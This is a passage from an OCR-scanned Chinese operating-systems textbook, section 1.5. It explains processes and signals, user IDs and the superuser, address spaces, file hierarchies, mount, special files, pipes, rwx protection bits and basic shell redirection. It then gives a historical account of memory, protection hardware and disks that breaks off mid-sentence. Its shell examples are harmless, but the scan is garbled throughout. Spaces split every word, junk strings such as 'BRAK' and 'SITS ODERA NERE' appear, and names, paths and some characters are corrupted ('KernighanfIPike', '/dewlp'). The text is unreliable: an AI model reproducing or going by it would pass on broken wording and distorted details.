此 通信 以 便 同 步 它 们 的 行为 。 这 种 通信 称 为 进程 间 通 信 O E) 
(interprocess communication ) ， 将 在 第 2 章 中 详细 讨论 。 


其 他 可 用 的 进程 系统 调用 包括 : 申请 更 多 的 内 存 (或 


图 1-13 一 个 进程 树 。 进 程 A 创 建 两 个 子 进程 B 
AS LA 
a T 等 待 一 个 子 进程 结束 、 用 另 一 个 程 和 C， 进 程 B 创 建 三 个 子 进程 D、EfnF 


有 了 时， 需要 向 一 个 正在 运行 的 进程 传送 信息 ， 而 该 进程 并 没有 等 待 接 收 信息 。 例 如 ， 一 个 进程 通过 
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网 络 向 另 一 台 机 器 上 的 进程 发 送 消息 进行 通信 。 为 了 保证 一 条 消息 或 消息 的 应 答 不 会 丢失 ， 发 送 者 要 求 
它 所 在 的 操作 系统 在 指定 的 若干 秒 后 给 一 个 通知 ， 这 样 如 果 对 方 尚未 收 到 确认 消息 就 可 以 进行 重 发 。 在 
设 定 该 定时 器 后 ， 程 序 可 以 继续 做 其 他 工作 。 

在 限定 的 秒 数 流逝 之 后 ， 操 作 系 统 向 该 进程 发 送 一 个 警告 信号 (alarm signal)。 此 信号 引起 该 进程 
暂时 挂 起 ， 无 论 该 进程 正在 做 什么 ， 系 统 将 其 寄存 器 的 值 保存 到 堆栈 ， 并 开始 运行 一 个 特别 的 信号 处 理 
过 程 ， 比 如 重新 发 送 可 能 丢失 的 消息 。 这 些 信号 是 软件 模拟 的 硬件 中 断 ， 除 了 定时 器 到 期 之 外 ， 该 信号 
可 以 由 各 种 原因 产生 。 许 多 由 硬件 检测 出 来 的 陷阱 ， 如 执行 了 非法 指令 或 使 用 了 无 效 地 址 等 ， 也 被 转换 
成 该 信号 并 交 给 这 个 进程 。 

系统 管理 器 授权 每 个 进程 使 用 一 个 给 定 的 UID (User IDentification) 。 每 个 被 启动 的 进程 都 有 一 个 
启动 该 进程 的 用 户 UID 。 子 进程 拥有 与 父 进程 一 样 的 UID。 用 户 可 以 是 某 个 组 的 成 员 ， 每 个 组 也 有 一 个 
GID (Group IDentification ) 。 

在 UNIX 中 ， 有 一 个 UID 称 为 超级 用 户 (superuser) ， 或 者 Windows 中 的 管理 员 (administrator) ， 它 
具有 特殊 的 权力 ， 可 以 违背 一 些 保护 规则 。 在 大 型 系统 中 ， 只 有 系统 管理 员 掌 握 着 成 为 超级 用 户 的 密码 ， 
但 是 许多 普通 用 户 (特别 是 学 生 ) 做 出 了 可 观 的 努力 ， 试 图 找 出 系统 的 缺陷 ， 从 而 使 他 们 不 用 密码 就 可 
以 成 为 超级 用 户 。 

在 第 2 章 中 ， 我 们 将 讨论 进程 以 及 进程 间 通 信 的 相关 内 容 。 


1.5.2 地 址 空间 

每 台 计 算 机 都 有 一 些 主 存 ， 用 来 保存 正在 执行 的 程序 。 在 非常 简单 的 操作 系统 中 ， 内 存 中 一 次 只 能 
有 一 个 程序 。 如 果 要 运行 第 二 个 程序 ， 第 一 个 程序 就 必须 被 移出 内 存 ， 再 把 第 二 个 程序 装 和 内存 。 

较 复杂 的 操作 系统 允许 在 内 存 中 同时 运行 多 道 程 序 。 为 了 避免 它们 互相 干扰 (包括 操作 系统 ) ， 需 
要 有 某 种 保护 机 制 。 虽 然 这 种 机 制 必然 是 硬件 形式 的 ， 但 是 由 操作 系统 掌控 。 

上 述 的 观点 涉及 对 计算 机 主 存 的 管理 和 保护 。 另 一 种 不 同 但 是 同样 重要 并 与 存储 器 有 关 的 内 容 ， 是 
管理 进程 的 地 址 空间 。 通 常 ， 每 个 进程 有 一 些 可 以 使 用 的 地 址 集合 ， 典 型 值 从 0 开始 直到 某 个 最 大 值 。 
在 最 简单 的 情形 下 ， 一 个 进程 可 拥有 的 最 大 地 址 空间 小 于 主 存 。 在 这 种 方式 下 ， 进 程 可 以 用 满 其 地 址 空 
间 ， 而 且 内 存 中 也 有 足够 的 空间 容纳 该 进程 。 

但 是 ， 在 许多 32 位 或 64 位 地 址 的 计算 机 中 ， 分别 有 2” 或 2“ 字 节 的 地 址 空间 。 如 果 一 个 进程 有 比 计 
算 机 拥有 的 主 存 还 大 的 地 址 空间 ， 而 且 该 进程 希望 使 用 全 部 的 内 存 ， 那 怎么 办 呢 ? 在 早期 的 计算 机 中 ， 
这 个 进程 只 好 “认命 ”了 。 现 在 ， 有 了 一 种 称 为 虚拟 内 存 的 技术 ， 正 如 前 面 已 经 介绍 过 的 ， 操 作 系统 可 
以 把 部 分 地 址 空间 装 入 主 存 ， 部 分 留 在 磁盘 上 ， 并 且 在 需要 时 来 回 交换 它们 。 在 本 质 上 ， 操 作 系统 创建 
了 一 个 地 址 空间 的 抽象 ， 作 为 进程 可 以 引用 地 址 的 集合 。 该 地 址 空间 与 机 器 的 物理 内 存 解压 ， 可 能 大 于 
也 可 能 小 于 该 物理 空间 。 对 地 址 空间 和 物理 空间 的 管理 组 成 了 操作 系统 功能 的 一 个 重要 部 分 ， 整 个 第 3 
章 都 与 这 个 主题 有 关 。 


1.5.3 文件 

实际 上 ， 支 持 操作 系统 的 另 一 个 关键 概念 是 文件 系统 。 如 前 所 述 ， 操 作 系统 的 一 项 主要 功能 是 隐藏 
磁盘 和 其 他 IO 设 备 的 细节 特性 ， 给 提供 程序 员 一 个 良好 、 清 晰 的 独立 于 设备 的 抽象 文件 模型 。 显 然 ， 
创建 文件 、 删 除 文件 、 读 文件 和 写 文件 等 都 需要 系统 调用 。 在 文件 可 以 读 取 之 前 ， 必 须 先 在 磁盘 上 定位 
和 打开 文件 ， 在 文件 读 过 之 后 应 该 关闭 该 文件 ， 有 关 的 系统 调用 则 用 于 完成 这 类 操作 。 

为 了 提供 保存 文件 的 地 方 ， 大 多 数 操作 系统 支持 目录 (directory) 的 概念 ， 从 而 可 把 文件 分 类 成 组 。 
比如 ， 学 生 可 给 所 选 的 每 个 课程 创建 一 个 目录 (用 于 保存 该 课程 所 需 的 程序 )， 另 设 一 个 目录 存放 电子 邮 
件 ， 再 有 一 个 目录 用 于 保存 万 维 网 主页 。 这 就 需要 系统 调用 创建 和 删除 目录 、 将 已 有 的 文件 放 入 目录 中 、 
从 目录 中 删除 文件 等 。 目 录 项 可 以 是 文件 或 者 目录 ， 这 样 就 产生 了 层次 结构 一 一 文件 系统 ， 如 图 1-14 所 示 。 

进程 和 文件 层次 都 可 以 组 织 成 树 状 结构 ， 但 这 两 种 树 状 结构 有 不 少 不 同 之 处 。 一 般 进 程 的 树 状 结构 
BRAK (很 少 超过 三 层 )， 而 文件 树 状 结构 的 层次 常常 多 达 四 层 、 五 层 或 更 多 层 。 进 程 树 层 次 结构 是 
暂时 的 ， 通 常 最 多 存在 几 分 钟 ， 而 且 录 层次 则 可 能 存在 数 年 之 久 。 进 程 和 文件 在 所 有 权 及 保护 方面 也 是 
有 区 别 的 。 典 型 地 ， 只 有 父 进 程 能 控制 和 访问 子 进程 ， 而 在 文件 和 目录 中 通常 存在 一 种 机 制 ， 使 文件 所 
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有 者 之 外 的 其 他 用 户 也 可 以 访问 该 文件 。 






Students Faculty 


Robbert Prof.White 








图 1-14 大 学 院 系 的 文件 系统 


目录 层 结构 中 的 每 一 个 文件 都 可 以 通过 从 目录 的 顶部 即 根 目录 (root directory) 开始 的 路 径 名 
(path name) 来 确定 。 绝 对 路 径 名 包含 了 从 根 目 录 到 该 文件 的 所 有 目录 清单 ， 它 们 之 间 用 正 斜 线 隔 开 。 
如 在 图 1-14 中 ,文件 CS101 的 路 径 名 是 /Faculty/Prof.Brown/Courses/CS101。 最 开始 的 正 斜 线 表 示 这 是 从 
根 目 录 开始 的 绝对 路 径 。 顺 便 提 及 ， 出 于 历史 原因 在 Windows 中 用 反 斜 线 (\) FFE ARATE, BERT 
ERA (/)， 这样 ， 上 面 给 出 的 文件 路 径 会 写 为 \Faculty\Prof.Brown\Courses\CS101。 在 本 书 中 ， 我 们 一 
般 使 用 UNIX 的 路 径 惯例 。 

在 实例 中 ， 每 个 进程 有 一 个 工作 目录 (working directory)， 对 于 没有 以 斜 线 开头 给 出 绝对 地 址 的 
路 径 ， 将 在 这 个 工作 目录 下 寻找 。 如 在 图 1-14 中 的 例子 ， 如 果 /Faculty/Prof.Brown 是 工作 目录 ， 那 么 
Courses/CS101 与 上 面 给 定 的 绝对 路 径 名 表示 的 是 同一 个 文件 。 进 程 可 以 通过 使 用 系统 调用 指定 新 的 工 
作 目 录 ， 从 而 变更 其 工作 目录 。 

在 读 写 文件 之 前 ， 首 先 要 打开 文件 ， 检 查 其 访问 权限 。 若 权限 许可 ， 系 统 将 返回 一 个 小 整数 ， 称 作 
文件 描述 符 (file descriptor) ， 供 后 续 操 作 使 用 。 若 禁止 访问 ， 系 统 则 返回 一 个 错误 码 。 

UNIX 中 的 另 一 个 重要 概念 是 安装 文件 系统 。 大 多 数 台式 机 都 有 一 个 或 多 个 光盘 驱动 器 ， 可 以 插入 CD- 
ROM、DVD 和 蓝光 光盘 。 它 们 几乎 都 有 USB 接 口 ， 可 以 插入 USB 存 储 棒 (实际 是 固态 磁盘 驱动 器 )。 为 了 
提供 一 个 出 色 的 方式 处 理 可 移动 介质 ，UNIX 人 允许 把 光盘 上 的 文件 系统 接 到 主 文件 树 上。 考虑 图 1-15a 的 情 
形 。 在 mount 调 用 之 前 ， 根 文件 系统 在 硬盘 上 ， 而 第 二 个 文件 系统 在 CD-ROM 上 ， 它 们 是 分 离 且 无 关 的 。 





图 1-15 a) 在 安装 前 ，CD-ROM 上 的 文件 不 可 访问 ，b) 在 安装 后 ， 它 们 成 了 文件 层次 的 一 部 分 
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然而 ， 不 能 使 用 CD-ROM 上 的 文件 系统 ， 因 为 上 面 没有 可 指定 的 路 径 。UNIX 不 允许 在 路 径 前 面 加 
上 驱动 器 名 称 或 代码 ， 那 样 做 就 完全 成 了 设备 相关 类 型 了 ， 这 是 操作 系统 应 该 消除 的 。 代 苦 的 方法 是 ， 
mount 系 统 调用 允许 把 在 CD-ROM 上 的 文件 系统 连接 到 程序 所 希望 的 根 文件 系统 上 。 在 图 1-15b 中 ，CD- 
ROM 上 的 文件 系统 安装 到 了 目录 b 上 ， 这 样 就 允许 访问 文件 /b/x 以 及 /b/y。 如 果 CD-ROM 已 安装 好 ， 但 目 
录 b 中 有 任何 不 能 访问 的 文件 ， 则 是 因为 /b 指 向 了 CD-ROM 的 根 目录 。( 在 开始 时 ， 不 能 访问 这 些 文件 似 
乎 并 不 是 一 个 严重 问题 : 文件 系统 几乎 总 是 安装 在 空 目录 上 。) 如 果 系 统 有 多 个 硬盘 ， 它 们 可 以 都 安装 
在 单个 树 上 。 

在 UNIX 中 ， 另 一 个 重要 的 概念 是 特殊 文件 (special file) 。 提 供 特 殊 文件 是 为 了 使 IO 设备 看 起 来 像 
文件 一 般 。 这 样 ， 就 像 使 用 系统 调用 读 写 文件 一 样 ，1/O 设 备 也 可 通过 同样 的 系统 调用 进行 读 写 。 有 两 
类 特殊 文件 : 块 特殊 文件 (block special file) 和 字符 特殊 文件 (character special file ) 。 块 特殊 文件 指 那 
些 由 可 随机 存 取 的 块 组 成 的 设备 ， 如 磁盘 等 。 比 如 打开 一 个 块 特殊 文件 ， 然 后 读 第 4 块 ， 程 序 可 以 直接 
访问 设备 的 第 4 块 而 不 必 考 虑 存放 该 文件 的 文件 系统 结构 。 类 似 地 ， 字 符 特殊 文件 用 于 打印 机 、 调 制 解 
调 器 和 其 他 接收 或 输出 字符 流 的 设备 。 按 照 惯例 ， 特 殊 文 件 保存 在 /dev 目 录 中 。 例 如 ，/dev/lp 是 打印 机 
(曾经 称 为 行 式 打 印 机 )。 . 

本 小 节 中 讨论 的 最 后 一 个 特性 既 与 进程 有 关 也 与 文件 有 关 : Wi ye 


进程 
管道 (pipe) 是 一 种 虚 文件 ， 它 可 连接 两 个 进程 ， 如 图 1-16 所 示 。 如 果 管道 
进程 A 和 B 希望 通过 管道 对 话 ， 它 们 必须 提前 设置 该 管道 。 当 进程 A 想 
对 进程 B 发 送 数据 时 ， 它 把 数据 写 到 管道 上 ， 仿 佛 管道 就 是 输出 文件 一 中 | PENE 
样 。 进 程 B 可 以 通过 读 该 管道 而 得 到 数据 ， 仿 佛 该 管道 就 是 一 个 输入 文 SITS ODERA NERE 
件 一 样 。 这 样 ， 在 UNIX 中 两 个 进程 之 间 的 通信 就 非常 类 似 于 普通 文件 的 读 写 了 。 更 为 强大 的 是 ， 若 进 
程 想 发 现 它 所 写 人 的 输出 文件 不 是 真正 的 文件 而 是 管道 ， 则 需要 使 用 特殊 的 系统 调用 。 文 件 系统 是 非常 
重要 的 。 我 们 将 在 第 4 章 以 及 第 10 章 和 第 11 章 中 具体 讨论 它们 。 


1.5.4 输入 /输出 

所 有 的 计算 机 都 有 用 来 获取 输入 和 产生 输出 的 物理 设备 。 毕 竟 , 如 果 用 户 不 能 告诉 计算 机 该 做 什么 ， 
而 在 计算 机 完成 了 所 要 求 的 工作 之 后 竟 不 能 得 到 结果 ， 那 么 计算 机 还 有 什么 用 处 呢 ? 有 各 种 类 型 的 输入 
和 和 输出 设备 ， 包 括 键盘 、 显 示 器 、 打 印 机 等 。 对 这 些 设备 的 管理 全 然 依 靠 操作 系统 。 

所 以 ， 每 个 操作 系统 都 有 管理 其 IO 设备 的 MO 子 系统 。 某 些 IO 软件 是 设备 独立 的 ， 即 这 些 IO 软件 
部 分 可 以 同样 应 用 于 许多 或 者 全 部 的 IO 设备 上 。LO 软 件 的 其 他 部 分 ， 如 设备 驱动 程序 ， 是 专门 为 特定 
的 IO 设备 设计 的 。 在 第 5 章 中 ， 我 们 将 讨论 IO 软件 。 


1.5.5 保护 

计算 机 中 有 大 量 的 信息 ， 用 户 经 常 希望 对 其 进行 保护 ， 并 保守 秘密 。 这 些 信息 包括 电子 邮件 、 商 业 
计划 、 退 税 等 诸多 内 容 。 管 理 系统 的 安全 性 完全 依靠 操作 系统 ， 例 如 ， 文 件 仅 供 授 权 用 户 访问 。 

作为 一 个 简单 的 例子 ， 以 便 读 者 对 如 何 实现 安全 有 一 个 概念 ， 请 考察 UNIX。UNIX 操 作 系 统 通过 对 
每 个 文件 赋予 一 个 9 位 的 二 进 制 保护 代码 ， 对 UNIX 中 的 文件 实现 保护 。 该 保护 代码 有 三 个 3 位 字段 ， 一 
个 用 于 所 有 者 ， 一 个 用 于 与 所 有 者 同 组 (用 户 被 系统 管理 员 划 分 成 组 ) 的 其 他 成 员 ， 一 个 用 于 其 他 人 。 
每 个 字段 中 有 一 位 用 于 读 访问 ， 一 位 用 于 写 访问 ， 一 位 用 于 执行 访问 。 这 些 位 就 是 知名 的 rwx 位 。 例 如 ， 
保护 代码 rwxr-x--x 的 含义 是 所 有 者 可 以 读 、 写 或 执行 该 文件 ， 其 他 的 组 成 员 可 以 读 或 执行 (但 不 能 写 ) 
该 文件 ， 而 其 他 人 可 以 执行 (但 不 能 读 和 写 ) 该 文件 。 对 一 个 目录 而 言 ，x 的 含义 是 允许 查询 。 一 条 短 
横 线 的 含义 是 ， 不 存在 对 应 的 许可 。 

除了 文件 保护 之 外 ， 还 有 很 多 有 关 安 全 的 问题 。 保 护 系统 不 被 人 类 或 非 人 类 (如 病毒 ) 入 侵 ， 则 是 
其 中 之 一 。 我 们 将 在 第 9 章 中 研究 各 种 安全 性 问题 。 
1.5.6 shell 

操作 系统 是 进行 系统 调用 的 代码 。 编 辑 器 、 编 译 器 、 汇 编程 序 、 链 接 程序 、 效 用 程序 以 及 命令 解释 
器 等 ， 尽管 非常 重要 ， 也 非常 有 用 ,但 是 它们 确实 不 是 操作 系统 的 组 成 部 分 。 为 了 避免 可 能 发 生 的 混淆 ， 
本 小 节 将 大 致 介绍 一 下 UNIX 的 命令 解释 器 ， 称 为 shell。 尽 管 shell 本 身 不 是 操作 系统 的 一 部 分 ， 但 它 体 
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现 了 许多 操作 系统 的 特性 ， 并 很 好 地 说 明了 系统 调用 的 具体 用 法 。shell 同 时 也 是 终端 用 户 与 操作 系统 之 
间 的 接口 ， 除 非 用 户 使 用 的 是 图 形 用 户 界 面 。 有 许多 种 shell， 如 sh、csh、ksh 以 及 bash 等 。 它 们 全 部 支 
持 下 面 所 介绍 的 功能 ， 这 些 功 能 可 追溯 到 早期 的 shell (Hish). 

用 户 登 录 时 , 同时 启动 了 一 个 shell。 它 以 终端 作为 标准 输入 和 标准 输出 。 首 先 显 示 提示 符 (prompt)， 
它 可 能 是 一 个 美元 符号 ， 提 示 用 户 shell 正 在 等 待 接收 命令 。 假 如 用 户 键 入 

date 


shell 创 建 一 个 子 进程 ， 并 运行 date 程 序 作为 子 进 程 。 在 该 子 进程 运行 期 间 ，shell 等 待 它 结束 。 在 子 进程 
结束 后 ，shell 再 次 显示 提示 符 ， 并 等 待 下 一 行 输入 。 
用 户 可 以 将 标准 输出 重 定向 到 一 个 文件 ， 如 键入 


date > file 


同样 ， 也 可 以 将 标准 输入 重 定向 ， 如 : 
sort <file1 >file2 


该 命令 调用 sort 程 序 ， 从 filel 中 取得 输入 ， 输 出 送 到 file2。 

可 以 将 一 个 程序 的 输出 通过 管道 作为 另 一 程序 的 输入 ， 因 此 有 

cat file1 file2 file3 | sort >/dev/Ip 
所 调用 的 cat 程 序 将 这 三 个 文件 合并 ， 其 结果 送 到 sort 程 序 并 按 字典 序 排序 。sort 的 输出 又 被 重 定向 到 文 
件 /dewlp 中 ， 显 然 ， 这 是 打印 机 。 

如 果 用 户 在 命令 后 加 上 一 个 “& ”符号 ， 则 shell 将 不 等 待 其 结束 ， 而 直接 显示 出 提示 符 。 所 以 

cat file1 file2 file3 |sort>/dev/Ip & 


将 启动 sort 程 序 作为 后 台 任 务 执行 ， 这 样 就 允许 用 户 继续 工作 ， 而 sort 命 令 也 继续 进行 。shell 还 有 许多 其 
他 有 用 的 特性 ， 由 于 篇 幅 有 限 而 不 能 在 这 里 讨论 。 有 许多 UNIX 的 书籍 具体 地 讨论 了 shell (例如 ， 
KernighanfIPike, 1984; Quigley, 2004; Robbins, 2005), 

现在 ， 许 多 个 人 计算 机 使 用 GUI。 事 实 上 ，GUI 与 shell 类 似 ，GUI 只 是 一 个 运行 在 操作 系统 顶部 的 
程序 。 在 Linux 系 统 中 ， 这 个 事实 更 加 明显 ， 因 为 用 户 (至 少 ) 可 以 在 两 个 GUI 中 选择 一 个 : Gnome 和 
KDE, 或 者 干脆 不 用 (使 用 X11 上 的 终端 视窗 )。 在 Windows 中 也 可 以 用 不 同 的 程序 代替 标准 的 GUI 桌 面 
(Windows Explorer)， 这 可 以 通过 修改 注册 表 中 的 某 些 数 值 实现 ， 不 过 极 少 有 人 这 样 做 。 


1.5.7 个 体重 复 系统 发 育 

在 达尔 文 的 《物种 起 源 》 (On the Origin of the Species) 一 书 出 版 之 后 ， 德 国 动物 学 家 Ernst 
Haeckel 论述 了 “个 体重 复 系统 发 育 ”(ontogeny recapitulates phylogeny) 。 他 这 和 句 话 的 含义 是 ， 个 体重 
复 着 物种 的 演化 过 程 。 换 句 话 说， 在 一 个 卵子 受精 之 后 成 为 人 体 之 前 ， 这 个 卵子 要 经 过 是 鱼 、 是 猪 等 阶 
段 。 现 代 生 物 学 家 认为 这 是 一 种 粗略 的 简化 ， 不 过 这 种 观点 仍旧 包含 了 真理 的 核心 部 分 。 

在 计算 机 的 历史 中 ， 类 似 情 形 也 有 发 生 。 每 个 新 物种 (大 型 机 、 小 型 计算 机 、 个 人 计算 机 、 掌 上 、 
代入 式 计算 机 、 智 能 卡 等 ) ， 无 论 是 硬件 还 是 软件 ， 似 乎 都 要 经 过 它们 前 辈 的 发 展 阶 段 。 计 算 机 科学 和 
许多 领域 一 样 ， 主 要 是 由 技术 驱动 的 。 古 罗马 人 缺少 汽车 的 原因 不 是 因为 他 们 非常 喜欢 步行 ， 是 因为 他 
们 不 知道 如 何 造 汽车 。 个 人 计算 机 的 存在 ,不 是 因为 数 以 百 万 计 的 人 有 着 迫切 的 愿望 一 一 拥有 一 台 计 算 
机 ， 而 是 因为 现在 可 以 很 便宜 地 制造 它们 。 我 们 常常 忘 了 技术 是 如 何 影 响 我 们 对 各 种 系统 的 观点 的 ， 所 
以 有 时 值得 再 仔细 考虑 它们 。 

特别 地 ， 技 术 的 变化 会 导致 某 些 思想 过 时 并 迅速 消失 ， 这 种 情形 经 常 发 生 。 但 是 ， 技 术 的 另 一 种 变 
化 还 可 能 使 某 些 思想 再 次 复活 。 在 技术 的 变化 影响 了 某 个 系统 不 同 部 分 之 间 的 相对 性 能 时 ， 情 况 就 是 这 
样 。 例 如 ， 当 CPU 远 快 于 存储 器 时 ， 为 了 加 速 “ 慢 速 ”的 存储 器 ， 高 速 缓存 是 很 重要 的 。 某 一 天 ， 如 果 
新 的 存储 器 技术 使 得 存储 器 远 快 于 CPU， 高 速 缓存 就 会 消失 。 而 如 果 新 的 CPU 技术 又 使 CPU 远 快 于 存储 
器 ， 高 速 缓存 就 会 再 次 出 现 。 在 生物 学 上 ， 消 失 是 永远 的 ， 但 是 在 计算 机 科学 中 ， 这 种 消失 有 时 只 有 几 
年 时 间 。 
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在 本 书 中 ， 暂 时 消失 的 结果 会 造成 我 们 有 时 需要 反复 考察 一 些 “ 过 时 ”的 概念 ， 即 那些 在 当代 技术 
中 并 不 理想 的 思想 。 而 技术 的 变化 会 把 一 些 “ 过 时 概念 ” 带 回来 。 正 由 于 此 ， 更 重要 的 是 要 理解 为 什么 
一 个 概念 会 过 时 ， 什 么 样 环境 的 变化 又 会 启用 “过 时 概念 ”。 

为 了 把 这 个 观点 叙述 得 更 透彻 ， 我 们 考虑 一 些 例子 。 早 期 计算 机 采用 了 硬 连 线 指令 集 。 这 种 指令 可 
由 硬件 直接 执行 ， 且 不 能 改变 。 然 后 出 现 了 微 程序 设计 (首先 在 IBM 360 上 大 规模 引入 )， 其 中 的 解释 器 执 
行 软件 中 的 指令 。 于 是 硬 连 线 执行 过 时 了 ， 因 为 不 够 灵活 。 接 着 发 明了 RISC 计 算 机 ， 微 程序 设计 ( 即 解 
释 执行 ) 过 时 了 ， 这 是 因为 直接 执行 更 快 。 而 在 通过 Internet 发 送 并 且 到 达 时 才 解 释 的 Java 小 程序 形式 中 ， 
我 们 又 看 到 了 解释 执行 的 复苏 。 执 行 速度 并 不 总 是 关键 因素 ， 但 由 于 网 络 的 延迟 非常 大 ， 以 至 于 它 成 了 主 
要 因素 。 这 样 ,“ 钟 摆 ” 在 直接 执行 和 解释 执行 之 间 已 经 晃动 了 好 几 个 周期 ， 也 许 在 未 来 还 会 再 次 晃动 。 

1. 大 型 内 存 

现在 来 分 析 硬件 的 某 些 历史 发 展 过 程 ， 并 看 看 硬件 是 如 何 重复 地 影响 软件 的 。 第 一 代 大 型 机 内 存 有 
限 。 在 1959 年 至 1964 年 之 间 ， 称 为 “山寨 王 ” 的 IBM 7090 或 7094 满 载 也 只 有 128KB 多 的 内 存 。 该 机 器 
多 数 用 汇编 语言 编程 ， 为 了 节省 内 存 ， 其 操作 系统 用 汇编 语言 编写 。 

随 着 时 间 的 推移 ， 在 汇编 语言 宣告 过 时 时 ，FORTRAN 和 COBOL 之 类 语言 的 编译 器 已 经 足够 好 了 。 
但 是 在 第 一 个 商用 小 型 计算 机 (PDP-1) 发 布 时 ， 却 只 有 4096 个 18 位 字 的 内 存 ， 而 且 令 人 吃惊 的 是 ， 汇 
编 语言 又 回来 了 。 最 终 ， 小 型 计算 机 获得 了 更 多 的 内 存 ， 而 且 高 级 语言 也 在 小 型 机 上 盛行 起 来 。 

在 20 世 纪 80 年 代 早 期 微型 计算 机 出 现时 ， 第 一 批 机 器 只 有 4KB 内 存 ， 汇 编 语言 又 复活 了 。 嵌 入 式 计 
算 机 经 常 使 用 和 微型 计算 机 一 样 的 CPU 芯片 (8080、Z80、 后 来 的 8086)， 而 且 一 开始 也 使 用 汇编 编程 。 
现在 ， 它 们 的 后 代 一 一 个 人 计算 机 拥有 大 量 的 内 存 ， 使 用 C、C++、Java 和 其 他 高 级 语言 编程 。 智 能 卡 
正在 走 着 类 似 的 发 展 道路 ， 而 且 除 了 确定 的 大 小 之 外 ， 智 能 卡通 常 使 用 Java 解 释 器 ， 解 释 执 行 Java 程 序 ， 
而 不 是 将 Java 编 译 成 智能 卡 的 机 器 语言 。 

2. 保护 硬件 

早期 的 IBM 7090/7094 等 大 型 机 没有 保护 硬件 ， 所 以 这 些 机 器 一 次 只 运行 一 个 程序 。 一 个 有 问题 
的 程序 就 可 能 毁 掉 操作 系统 ， 并 且 很 容易 使 机 器 崩溃 。 在 IBM 360 发 布 时 ， 提 供 了 保护 硬件 的 原型 ， 
这 些 机 器 可 以 在 内 存 中 同时 保持 若干 程序 ， 并 让 它们 轮流 运行 (多 道 程序 处 理 )。 于 是 单 道 程序 处 理 宣 
告 过 时 。 

至 少 是 到 了 第 一 个 小 型 计算 机 出 现时 一 一 还 没有 保护 硬件 一 一 所 以 多 道 程序 处 理 也 不 可 能 有 。 尽 管 
PDP-1 和 PDP-8 没 有 保护 硬件 ， 但 是 PDP-11 型 机 器 有 了 保护 硬件 ， 这 一 特点 导致 了 多 道 程序 处 理 的 应 用 ， 
并 且 最 终 导致 UNIX 操 作 系统 的 诞生 。 

在 建造 第 一 代 微型 计算 机 时 ， 使 用 了 Intel 8080 CPU 芯片 ， 但 是 没有 保护 硬件 ， 这 样 我 们 又 回 到 了 
单 道 程序 处 理 一 一 每 个 时 刻 只 运行 一 个 程序 。 直 到 Intel 80286 才 增加 了 保护 硬件 ， 于 是 有 了 多 道 程序 处 
理 。 直 到 现在 ， 许 多 嵌入 式 系统 仍旧 没有 保护 硬件 ， 而 且 只 运行 单个 程序 。 

现在 来 考察 操作 系统 。 第 一 代 大 型 机 原本 没有 保护 硬件 ， 也 不 支持 多 道 程序 处 理 ， 所 以 这 些 机 器 只 
运行 简单 的 操作 系统 ， 一 次 只 能 手工 装载 一 个 程序 。 后 来 ， 大 型 机 有 了 保护 硬件 ， 操 作 系统 可 以 同时 支 
持 运行 多 个 程序 ， 接 着 系统 拥有 了 全 功能 的 分 时 能 力 。 

在 小 型 计算 机 刚 出 现时 ， 也 没有 保护 硬件 ， 一 次 只 运行 一 个 手工 装载 的 程序 。 逐 渐 地 ， 小 型 机 有 了 
保护 硬件 ， 有 了 同时 运行 两 个 或 更 多 程序 的 能 力 。 第 一 代 微 型 计算 机 也 只 有 一 次 运行 一 个 程序 的 能 力 ， 
但 是 随后 具有 了 一 次 处 理 多 道 程序 的 能 力 。 掌 上 计算 机 和 智能 卡 也 走 着 类 似 的 发 展 之 路 。 

在 所 有 这 些 案例 中 ， 软 件 的 发 展 是 受制 于 技术 的 。 例 如 ， 第 一 代 微 型 计算 机 有 约 4KB 内 存 ， 没 有 保护 
硬件 。 高 级 语言 和 多 道 程序 处 理 对 于 这 种 小 系统 而 言 ， 无 法 获得 支持 。 随 着 微型 计算 机 演化 成 为 现代 个 人 
计算 机 ， 拥 有 了 必要 的 硬件 ， 从 而 有 了 必需 的 软件 处 理 以 支持 多 种 先进 的 功能 。 这 种 演化 过 程 看 来 还 要 持 
续 多 年 。 其 他 领域 也 有 类 似 的 这 种 轮回 现象 ， 但 是 在 计算 机 行业 中 ， 这 种 轮回 现象 似乎 变化 得 更 快 。 

3. 硬盘 

早期 大 型 机 主要 是 基于 磁带 的 。 机 器 从 磁带 上 读 和 程序、 编译、 运行 ,并 把 结果 写 到 另 一 个 磁带 上 。 
那 时 没有 磁盘 也 没有 文件 系统 的 概念 。 在 IBM 于 1956 年 引入 第 一 个 磁盘 RAMAC (RAndoM ACcess) 
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之 后 ， 事 情 开始 变化 。 这 个 磁盘 占据 4 平方 米 空间 ， 可 以 存储 500 万 7 位 长 的 字符 ， 这 是 够 存储 一 张 中 等 
分 辩 率 的 数字 照片 。 但 是 其 年 租金 高 达 35 000 美 元 ， 比 存储 占据 同样 空间 数量 的 胶卷 还 要 贵 。 不 过 这 个 
磁盘 的 价格 终于 还 是 下 降 了 ， 并 开始 出 现 了 原始 的 文件 系统 。 

拥有 这 些 新 技术 的 典型 机 器 是 CDC 6600， 该 机 器 于 1964 年 发 布 ， 在 多 年 之 内 始终 是 世界 上 最 快 的 
计算 机 。 用 户 可 以 通过 指定 名 称 的 方式 创建 所 谓 “ 永 久 文件 ”， 和 希望 这 个 名 称 还 没有 被 别人 使 用 ， 比 如 
“data” 就 是 一 个 适合 于 文件 的 名 称 。 这 个 系统 使 用 单 层 目录 。 后 来 在 大 型 机 上 开发 出 了 复杂 的 多 层 文 件 
系统 ，MULTICS 文 件 系 统 可 以 算是 多 层 文件 系统 的 顶峰 。 

接着 小 型 计算 机 投入 使 用 ,该 机 型 最 后 也 有 了 硬盘 。1970 年 在 PDP-11 上 引入 了 标准 硬盘 一 一 RK05 
磁盘 ,容量 为 2.5MB， 只 有 IBM RAMAC 一 半 的 容量 , 但 是 这 个 磁盘 的 直径 只 有 40 厘 米 ，5 厘 米 厚 。 不 过 ， 
其 原型 也 只 有 单 层 目 录 。 随 着 微型 计算 机 的 出 现 ，CP/M 开 始 成 为 操作 系统 的 主流 ， 但 是 它 也 只 是 在 
( 软 ) 盘 上 支持 单 目 录 。 

4. 虚拟 内 存 

虚拟 内 存 (安排 在 第 3 章 中 讨论 ) 通过 在 RAM 和 磁盘 中 反复 移动 信息 块 的 方式 ， 提 供 了 运行 比 机 
器 物理 内 存 大 的 程序 的 能 力 。 虚 拟 内 存 也 经 历 了 类 似 的 历程 ， 首 先 出 现在 大 型 机 上 ， 然 后 是 小 型 机 和 
微型 机 。 虚 拟 内 存 还 使 得 程序 可 以 在 运行 时 动态 地 链接 库 ， 而 不 是 必须 在 编译 时 链接 。MULTICS 是 第 
